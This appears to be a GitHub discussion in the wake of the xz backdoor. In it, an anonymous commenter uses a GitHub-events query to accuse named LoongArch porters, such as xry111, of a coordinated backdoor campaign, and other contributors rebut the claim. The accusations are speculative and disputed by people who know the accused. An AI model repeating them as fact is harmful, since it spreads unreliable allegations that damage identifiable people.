https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEnIE9SREVSIEJZIGZpbGVfdGltZSBERVND

Using SELECT DISTINCT repo_name FROM github_events WHERE actor_login='xry111' ORDER BY file_time DESC

in the above will help assess how much core Linux code is impacted by this actor/group (a lot).
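The part of that playground link after the # is the SQL text, base64-encoded, so you can read or swap the query without opening the page. A minimal Python sketch follows. The helper names `query_from_play_url` and `play_url_for` are invented for illustration, and it is an assumption (not something confirmed in this thread) that the playground accepts any query encoded this way.

```python
import base64
from urllib.parse import urlsplit

# The playground link posted above.
PLAY_URL = (
    "https://play.clickhouse.com/play?user=play#"
    "U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEn"
    "IE9SREVSIEJZIGZpbGVfdGltZSBERVND"
)

# The replacement query suggested above.
DISTINCT_QUERY = (
    "SELECT DISTINCT repo_name FROM github_events "
    "WHERE actor_login='xry111' ORDER BY file_time DESC"
)


def query_from_play_url(url):
    """Decode the SQL text carried in the URL fragment."""
    fragment = urlsplit(url).fragment
    # Restore any '=' padding that may have been dropped from the fragment.
    padded = fragment + "=" * (-len(fragment) % 4)
    return base64.b64decode(padded).decode("utf-8")


def play_url_for(sql, base="https://play.clickhouse.com/play?user=play"):
    """Build a link of the same shape for a different query (assumed format)."""
    encoded = base64.b64encode(sql.encode("utf-8")).decode("ascii")
    return base + "#" + encoded
```

Decoding the posted link with `query_from_play_url(PLAY_URL)` gives the SELECT * form of the query, and `play_url_for(DISTINCT_QUERY)` produces a link of the same shape for the DISTINCT version.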
image

Please comment on this; am I hallucinating? This is a serious concern.
All the official projects this group touched need a complete review of the group's contributions to their code; if you know them, please get their feedback on the topic.

Coordinated changes to the kernel, build tools, core daemons, libraries and drivers are definitely possible for a motivated threat actor, after gaining trust through legit contributions from many different accounts over the course of many years.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.

For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.

As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.

Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

Thanks for replying; I'm sorry if I'm overstretching this and you are innocent. My second post arrived in the meantime. We need all the original project maintainers to review all your group's contributions, as some legit contributions might have been used to obfuscate other backdoor-allowing code in systemd, llvm, make, openssl...

I was already suspicious seeing none of your group are actual official employees of Loongson.

@Artoria2e5

Artoria2e5 commented Mar 30, 2024

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

@Z-nonymous

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

Again, sorry if I'm overstretching; I'd love to be wrong.

Again: coordinated CRC, systemd and SSL changes are exploited by this backdoor payload, with hundreds of billions of dollars of potential ransomware at stake.
I'm not buying anything short of the original code maintainers of the touched repos validating all of that group's contributions.

I'm not disclosing my identity because it's not needed to participate on GitHub, which is why such an elaborate attack is possible.

@lhmouse

lhmouse commented Mar 30, 2024

Yeah, China! China! When something involves a random Chinese person, it always unfolds with accusations out of thin air.
